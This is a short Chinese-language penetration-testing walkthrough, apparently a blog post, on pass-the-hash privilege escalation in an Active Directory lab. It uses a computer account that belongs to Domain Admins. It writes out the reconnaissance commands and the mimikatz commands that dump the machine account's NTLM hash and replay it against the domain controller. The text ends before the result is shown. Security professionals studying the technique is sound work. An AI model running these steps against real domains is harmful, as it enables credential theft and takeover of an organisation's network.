pass the hash攻击,除去常见的使用本地管理员账户进行hash传递外,还可以使用机器账户进行提权。
如果在主机上授予了本地管理员访问权限,并且计算机本身为Domain admins组的成员,那我们在进行渗透测试时,可以利用该计算机账户进行提权。以机器账户来使用hash传递来进行提权。
环境模拟:
WIN2016.attack.local 10.10.10.128 主机在Domain admins组下
已经获得WIN2016机器的本地管理员权限
识别计算机账户所在组
Active Directory模块查找可用计算机账户
利用Powershell中的Active Directory模块来识别当前计算机所在组
1 | Get-ADComputer -Filter * -Properties MemberOf | ? {$_.MemberOf} |
不过很遗憾,我在普通权限下的域主机中,未能通过此命令查找到任何可用计算机账户,即使我已经在前一步将本机的计算机账户添加进高权限组内也未能查找到任何有效信息,唯有在域控机下才查找到了结果。
但很显然,在域管机器下可查找在当前我们所需要的条件下根本就不现实,因此我们可以选择另一个方法进行信息收集,查找可用主机账户进行提权。
net group查找
利用net group 查找敏感组内是否存在可用机器账户
1 | net group "domain admins" |
导出WIN2016$账户的NTLM hash
利用mimikatz模块导出WIN2016$账户的NTLM hash
1 | sekurlsa::msv |
以WIN2016$账户进行pth
1 | sekurlsa::pth /user:WIN2016$ /ntlm:56c1672b5bb172505748aade48865c07 /domain:attack.local |
可以看到,在pth攻击前,我们无法访问dc的共享目录
执行后
